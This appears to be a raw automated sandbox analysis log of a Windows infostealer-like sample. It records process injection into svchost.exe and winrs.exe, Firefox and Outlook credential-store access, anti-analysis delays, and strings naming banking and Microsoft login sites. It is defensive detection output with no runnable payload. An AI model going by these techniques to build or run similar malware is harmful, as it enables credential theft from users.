                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winrs.exe, 0000000A.00000003.1579586366.0000000000887000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1579586366.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: A2028041200SD.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\A2028041200SD.exe "C:\Users\user\Desktop\A2028041200SD.exe"
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: A2028041200SD.exeStatic file information: File size 1214464 > 1048576
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zJGHFZpQDL.exe, 00000009.00000002.3122329722.0000000000A8E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090E01E LoadLibraryA,GetProcAddress,0_2_0090E01E
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00916B05 push ecx; ret 0_2_00916B18
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091BDAA push edi; ret 0_2_0091BDAC
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091BEC3 push esi; ret 0_2_0091BEC5
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_01277F23 push esp; iretd 0_2_01277F24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B4A23 push esi; retf 8_2_024B4A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B3220 push eax; ret 8_2_024B3222
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B4A20 push esi; retf 8_2_024B4A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BD376 push ds; ret 8_2_024BD388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C5BF3 push esi; retf 8_2_024C5BFE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BA9DB push edx; retf 8_2_024BA9DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B51D0 push es; iretd 8_2_024B51D2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C4675 push ebp; retf 8_2_024C4688
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B161B push E588A11Fh; iretd 8_2_024B1623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C7F6B push ebx; iretd 8_2_024C7F71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B87CB push es; ret 8_2_024B87CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024D3413 pushfd ; ret 8_2_024D3437
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B6415 push edx; retf 8_2_024B641C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F309AD push ecx; mov dword ptr [esp], ecx8_2_02F309B6
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA5C50 push es; ret 9_2_04AA5C52
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB7DF7 push edx; retf 9_2_04AB7DF8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA1EA8 push esi; retf 9_2_04AA1EB3
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA1EA5 push esi; retf 9_2_04AA1EB3
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA7E60 push edx; retf 9_2_04AA7E61
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA2655 push es; iretd 9_2_04AA2657
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAA7FB push ds; ret 9_2_04AAA80D
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA389A push edx; retf 9_2_04AA38A1
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AC0898 pushfd ; ret 9_2_04AC08BC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3078 push esi; retf 9_2_04AB3083
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3076 push esi; retf 9_2_04AB3083
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB1AFA push ebp; retf 9_2_04AB1B0D
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB53F0 push ebx; iretd 9_2_04AB53F6
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00958111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00958111
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0090EB42
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0091123A
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\A2028041200SD.exeAPI/Special instruction interceptor: Address: 12778AC
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7096E rdtsc 8_2_02F7096E
                Source: C:\Users\user\Desktop\A2028041200SD.exeEvaded block: after key decisiongraph_0-87518
                Source: C:\Users\user\Desktop\A2028041200SD.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116Thread sleep time: -31000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exe TID: 7988Thread sleep count: 46 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exe TID: 7988Thread sleep time: -92000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00936CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00936CA9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009360DD
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009363F9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093EB60
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093F5FA
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093F56F FindFirstFileW,FindClose,0_2_0093F56F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941B2F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941C8A
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00941F94
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0090DDC0
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: -4EF4J77B.10.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: -4EF4J77B.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: -4EF4J77B.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: -4EF4J77B.10.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: -4EF4J77B.10.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: -4EF4J77B.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: -4EF4J77B.10.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: -4EF4J77B.10.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: firefox.exe, 0000000D.00000002.1692503564.0000021577A3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: -4EF4J77B.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: -4EF4J77B.10.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: -4EF4J77B.10.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: zJGHFZpQDL.exe, 00000009.00000002.3123505923.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.(
                Source: -4EF4J77B.10.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: -4EF4J77B.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: -4EF4J77B.10.drBinary or memory string: global block list test formVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: -4EF4J77B.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: -4EF4J77B.10.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: -4EF4J77B.10.drBinary or memory string: discord.comVMware20,11696501413f
                Source: -4EF4J77B.10.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\A2028041200SD.exeAPI call chain: ExitProcess graph end nodegraph_0-87198
